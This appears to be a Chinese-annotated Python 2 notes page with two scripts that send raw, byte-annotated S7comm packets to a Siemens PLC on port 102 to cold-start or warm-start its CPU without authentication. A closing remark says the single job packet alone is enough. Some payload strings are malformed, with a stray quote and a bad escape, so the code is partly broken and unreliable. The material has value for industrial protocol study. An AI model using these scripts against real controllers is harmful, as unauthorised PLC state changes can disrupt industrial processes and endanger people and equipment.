西门子_snap7_python命令注释

#冷启动

#!/usr/bin/python2

#coding:utf-8

import time

import socket

 

PLC_ADDR = "192.168.43.106" 

#目标主机地址

PLC_PORT = int("102")

#102端口

 

create_connect_payload = '\x03\x00\x00\x16\x11\xe0\x00\x00\x00\x01\x00\xc0\x01\x0a\xc1\x02\x01\x00\xc2\x02\x01\x02'

#COTP

#TPKT version:3 reservef :0000 length:22

#ISO length :17 pdu type 0x0e(cr connect request) destination reference :0x0000

#source reference:0x0001 calss:0 (no explicit flow control :false)

#parameter code xc1(sr c-tsap) source tsap:x0100

#parameter code :xc2(dst-tsap) Parameter length :2 destination tsap:x0102

 

setup_communication_payload = '\x03\x00\x00\x19\x02\xf0\x80\x32\x01\x00\x00\x00\x00\x00\x08\x00\x00\xf0\x00\x00\x01\x00\x01\x01\xe0''

#TPKT VERSION：03，reserved 0000   length 25(16进制为19)

#ISO  length：  02  PDU type ：f0 (dt data)  

#destination reference:10000000(last data unit:yes)

#s7comm Header protocol Id :x32 rosctr ;1(job)

#redundancy identification :0x0000 protocol data unit reference: 0 parameter length :x0008

#Data length:x0000

#parameter : fucntion :xf0  reserved:x00 Max AmQ calling:x0001 Max AmQ called :x000

#PDU length:480(16进制x01e0)

 

 

 

 

cpu_start_payload= '\x03\x00\x00\x27\x02\xf0\x80\x32\x01\x00\x00\x9f\x00\x00\x16\x00\x00\x28\x00\x00\x00\x00\x00\x00\xfd\x00\x02\x43\x20\x09\x50\x5f\x50\x52\x4f\x47\x52\x41\4d'

#TPKT version 3 reserved:x0000 length:39

#ISO length:2 pdu type:xf0 (dt data)

#destination reference:10010000(last data unit:yes)

#S7Comm Header protocol id 0x32 rosctr:x01 Redundancy Identification (Reserved): 0x0000

#Protocol Data Unit Reference: 64512 parameter length:22(x0016) data length :x0000

#Parameter function:0x28(pi-service) unknown bytes:000000000000fd

#parameter block length :x0002 string length:9(冷启动程序代码长度)

#冷启动代码

 

 

s = socket.socket()

s.connect((PLC_ADDR, PLC_PORT))

time.sleep(0.5)

s.send(create_connect_payload)

s.recv(1024)

time.sleep(0.5)

s.send(setup_communication_payload)

s.recv(1024)

time.sleep(0.5)

s.send(cpu_start_payload)

s.recv(1024)

s.close()

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

#热启动

#!/usr/bin/python2

#coding:utf-8

import time

import socket

 

PLC_ADDR = "192.168.43.106" 

#目标主机地址

PLC_PORT = int("102")

#102端口

 

create_connect_payload = '\x03\x00\x00\x16\x11\xe0\x00\x00\x00\x01\x00\xc0\x01\x0a\xc1\x02\x01\x00\xc2\x02\x01\x02'

#COTP

#TPKT version:3 reservef :0000 length:22

#ISO length :17 pdu type 0x0e(cr connect request) destination reference :0x0000

#source reference:0x0001 calss:0 (no explicit flow control :false)

#parameter code xc1(sr c-tsap) source tsap:x0100

#parameter code :xc2(dst-tsap) Parameter length :2 destination tsap:x0102

 

setup_communication_payload = '\x03\x00\x00\x19\x02\xf0\x80\x32\x01\x00\x00\x00\x00\x00\x08\x00\x00\xf0\x00\x00\x01\x00\x01\x01\xe0''

#TPKT VERSION：03，reserved 0000   length 25(16进制为19)

#ISO  length：  02  PDU type ：f0 (dt data)  

#destination reference:10000000(last data unit:yes)

#s7comm Header protocol Id :x32 rosctr ;1(job)

#redundancy identification :0x0000 protocol data unit reference: 0 parameter length :x0008

#Data length:x0000

#parameter : fucntion :xf0  reserved:x00 Max AmQ calling:x0001 Max AmQ called :x000

#PDU length:480(16进制x01e0)

 

 

 

 

cpu_start_payload= '\x03\x00\x00\x25\x02\xf0\x80\x32\x01\x00\x00\x63\x00\x00\x14\x00\x00\x28\x00\x00\x00\x00\x00\x00\xfd\x00\x00\x09\x50\x5f\x50\x52\x4f\x47\x52\x41\x4d'

#TPKT version 3 reserved:x0000 length:37

#ISO length:2 pdu type:xf0 (dt data)

#destination reference:10010000(last data unit:yes)

#S7Comm Header protocol id 0x32 rosctr:x01 Redundancy Identification (Reserved): 0x0000

#Protocol Data Unit Reference: 25344 parameter length:20(x0014) data length :x0000

#Parameter function:0x28(pi-service) unknown bytes:000000000000fd

#parameter block length :x0000 string length:9(热启动程序代码长度)

#热启动代码

 

 

s = socket.socket()

s.connect((PLC_ADDR, PLC_PORT))

time.sleep(0.5)

s.send(create_connect_payload)

s.recv(1024)

time.sleep(0.5)

s.send(setup_communication_payload)

s.recv(1024)

time.sleep(0.5)

s.send(cpu_start_payload)

s.recv(1024)

s.close()

 

 

#实验中发现 即使没有create_connect_payload和setup_communication_payload指令而只#发个job指令就可以执行相应操作 但setup_communication_payload用于向上位机申请#960byte的内存空间 如果缺少可能在复杂情况下有问题，同理在每个#setup_communication_payload前snap会发送cotp协议建立底部连接从而使通信稳定具

#体内容不是讨论重点